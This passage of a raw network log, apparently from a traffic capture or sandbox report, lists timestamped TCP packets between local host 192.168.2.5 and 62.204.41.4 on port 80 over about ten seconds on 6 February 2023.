                                                        Feb 6, 2023 14:19:04.681216002 CET805019862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.683567047 CET805019862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.683759928 CET5019880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.790893078 CET5019880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.791773081 CET5019980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.852169037 CET805019962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.852314949 CET805019862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.852540970 CET5019880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.853143930 CET5019980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.853143930 CET5019980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.913314104 CET805019962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.915909052 CET805019962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.916935921 CET5019980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.025722027 CET5019980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.026561975 CET5020080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.086157084 CET805019962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.087193966 CET5019980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.088047028 CET805020062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.088237047 CET5020080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.093128920 CET5020080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.154584885 CET805020062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.158956051 CET805020062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.159082890 CET5020080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.276701927 CET5020080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.278806925 CET5020180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.338274002 CET805020062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.338407040 CET5020080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.341247082 CET805020162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.341470003 CET5020180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.341830969 CET5020180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.404321909 CET805020162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.408659935 CET805020162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.411192894 CET5020180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.526860952 CET5020180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.527945042 CET5020280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.589474916 CET805020162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.589752913 CET5020180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.590338945 CET805020262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.590711117 CET5020280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.591073990 CET5020280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.653570890 CET805020262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.656107903 CET805020262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.656485081 CET5020280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.762309074 CET5020280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.762967110 CET5020380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.827419043 CET805020362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.827474117 CET805020262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.827651024 CET5020280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.828052998 CET5020380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.828473091 CET5020380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:05.889669895 CET805020362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.892863035 CET805020362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:05.893013954 CET5020380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.010391951 CET5020380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.011326075 CET5020480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.071831942 CET805020362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.072000027 CET5020380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.072654009 CET805020462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.072796106 CET5020480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.078376055 CET5020480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.139733076 CET805020462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.144231081 CET805020462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.144391060 CET5020480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.259884119 CET5020480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.260765076 CET5020580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.321391106 CET805020462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.321551085 CET5020480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.322901011 CET805020562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.323251963 CET5020580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.323849916 CET5020580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.386025906 CET805020562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.389614105 CET805020562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.389739037 CET5020580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.509454966 CET5020580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.510175943 CET5020680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.571542025 CET805020662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.571583986 CET805020562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.571688890 CET5020680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.571723938 CET5020580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.573237896 CET5020680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.634736061 CET805020662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.638559103 CET805020662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.638631105 CET5020680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.751935005 CET5020680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.753197908 CET5020780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.813554049 CET805020662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.813644886 CET5020680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.815664053 CET805020762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.815809011 CET5020780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.819267988 CET5020780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:06.881774902 CET805020762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.884358883 CET805020762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:06.884588957 CET5020780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.006587982 CET5020780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.007303953 CET5020880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.069370031 CET805020762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:07.069631100 CET5020780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.069788933 CET805020862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:07.069880962 CET5020880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.190881014 CET5020880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.253447056 CET805020862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:07.259404898 CET805020862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:07.259478092 CET5020880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.370815039 CET5020880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.371539116 CET5020980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.433521986 CET805020862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:07.433665037 CET5020880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.433794022 CET805020962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:07.433866024 CET5020980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.475846052 CET5020980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.542020082 CET805020962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:07.542187929 CET805020962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:07.542287111 CET5020980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.697663069 CET5020980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.698354006 CET5021080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.760071039 CET805020962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:07.763084888 CET805021062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:07.763279915 CET5020980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.763322115 CET5021080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.790071011 CET5021080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:07.852601051 CET805021062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:07.856143951 CET805021062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:07.859236956 CET5021080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:08.443454981 CET5021080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:08.444267035 CET5021180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:08.506046057 CET805021062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:08.506135941 CET5021080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:08.506607056 CET805021162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:08.506726027 CET5021180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:08.508471012 CET5021180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:08.573156118 CET805021162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:08.577630997 CET805021162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:08.580694914 CET5021180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:08.721110106 CET5021180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:08.721816063 CET5021280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:08.783529043 CET805021162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:08.783698082 CET5021180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:08.784567118 CET805021262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:08.784696102 CET5021280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:08.785161972 CET5021280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:08.847542048 CET805021262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:08.850505114 CET805021262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:08.850589037 CET5021280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:09.954179049 CET5021280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:09.955645084 CET5021380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.016849041 CET805021262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.016884089 CET805021362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.016915083 CET5021280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.016968966 CET5021380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.017712116 CET5021380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.078838110 CET805021362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.085311890 CET805021362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.085772991 CET5021380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.222516060 CET5021380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.223357916 CET5021480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.283921003 CET805021362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.284091949 CET5021380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.284674883 CET805021462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.284781933 CET5021480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.427527905 CET5021480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.489166021 CET805021462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.492854118 CET805021462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.493029118 CET5021480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.607484102 CET5021480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.608186960 CET5021580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.668771982 CET805021562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.668869972 CET5021580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.668912888 CET805021462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.669087887 CET5021480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.669292927 CET5021580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.729701996 CET805021562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.734399080 CET805021562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.734482050 CET5021580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.838686943 CET5021580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.839474916 CET5021680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.899347067 CET805021562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.899564028 CET5021580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.900839090 CET805021662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.900969028 CET5021680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.901300907 CET5021680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:10.962577105 CET805021662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.965966940 CET805021662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:10.966095924 CET5021680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.075025082 CET5021680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.076009035 CET5021780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.136698008 CET805021662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.136795998 CET5021680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.137500048 CET805021762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.137593985 CET5021780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.137962103 CET5021780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.199484110 CET805021762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.204516888 CET805021762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.204586029 CET5021780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.318406105 CET5021780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.319552898 CET5021880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.380096912 CET805021762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.380172968 CET5021780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.381165981 CET805021862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.381278038 CET5021880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.381608963 CET5021880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.443145037 CET805021862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.446054935 CET805021862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.446212053 CET5021880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.558145046 CET5021880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.558928967 CET5021980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.619997978 CET805021862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.621103048 CET805021962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.621304035 CET5021880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.621345997 CET5021980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.621916056 CET5021980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.684397936 CET805021962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.687207937 CET805021962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.687397003 CET5021980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.795675993 CET5021980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.796350956 CET5022080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.857949018 CET805022062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.858000040 CET805021962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.858237028 CET5021980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.858797073 CET5022080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.858797073 CET5022080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:11.920233965 CET805022062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.924299955 CET805022062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:11.927799940 CET5022080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.041743040 CET5022080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.042479992 CET5022180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.101701021 CET805022162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.103224993 CET805022062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.103425980 CET5022080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.104837894 CET5022180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.104837894 CET5022180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.164127111 CET805022162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.170964956 CET805022162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.173602104 CET5022180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.275899887 CET5022180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.277143002 CET5022280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.335326910 CET805022162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.336463928 CET805022262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.336632967 CET5022180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.336672068 CET5022280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.337101936 CET5022280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.396338940 CET805022262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.400702000 CET805022262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.403724909 CET5022280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.511375904 CET5022280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.512166977 CET5022380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.570771933 CET805022262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.571559906 CET805022362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.571707010 CET5022280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.571746111 CET5022380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.572504044 CET5022380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.632580996 CET805022362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.636516094 CET805022362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.636696100 CET5022380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.770126104 CET5022380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.770948887 CET5022480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.830373049 CET805022362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.830621958 CET5022380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.833373070 CET805022462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.833606005 CET5022480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.834481955 CET5022480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:12.896965027 CET805022462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.900197983 CET805022462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:12.900336027 CET5022480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.010338068 CET5022480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.011194944 CET5022580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.071836948 CET805022562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.071973085 CET5022580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.073013067 CET805022462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.073060989 CET5022580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.073097944 CET5022480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.133991957 CET805022562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.140642881 CET805022562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.140898943 CET5022580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.244842052 CET5022580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.245690107 CET5022680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.305468082 CET805022562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.305666924 CET5022580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.307367086 CET805022662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.307513952 CET5022680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.307960033 CET5022680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.369458914 CET805022662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.373641014 CET805022662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.373857021 CET5022680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.479648113 CET5022680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.484760046 CET5022780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.541876078 CET805022662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.542584896 CET5022680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.544352055 CET805022762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.544537067 CET5022780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.545015097 CET5022780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.604593039 CET805022762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.608417034 CET805022762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.608547926 CET5022780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.717015028 CET5022780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.718290091 CET5022880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.776716948 CET805022762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.776823044 CET5022780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.780766010 CET805022862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.780953884 CET5022880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.781549931 CET5022880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.843877077 CET805022862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.847825050 CET805022862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.848026991 CET5022880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.963879108 CET5022880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.964576960 CET5022980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.024205923 CET805022962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.024322987 CET5022980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.024749994 CET5022980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.026307106 CET805022862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.026381969 CET5022880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.084294081 CET805022962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.089824915 CET805022962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.089921951 CET5022980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.197875977 CET5022980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.198739052 CET5023080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.257551908 CET805022962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.257693052 CET5022980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.259342909 CET805023062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.259510040 CET5023080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.260159016 CET5023080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.320748091 CET805023062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.326316118 CET805023062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.326647043 CET5023080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.441436052 CET5023080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.442356110 CET5023180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.505348921 CET805023162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.505384922 CET805023062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.505590916 CET5023080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.505712986 CET5023180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.506548882 CET5023180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.567112923 CET805023162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.571222067 CET805023162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.571419954 CET5023180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.687411070 CET5023180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.688735962 CET5023280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.748217106 CET805023162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.749021053 CET805023262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.749196053 CET5023180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.749268055 CET5023280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.756016016 CET5023280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.817076921 CET805023262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.823223114 CET805023262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.824412107 CET5023280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.935731888 CET5023280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.936695099 CET5023380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.996278048 CET805023262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.996464014 CET5023280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.999247074 CET805023362.204.41.4192.168.2.5
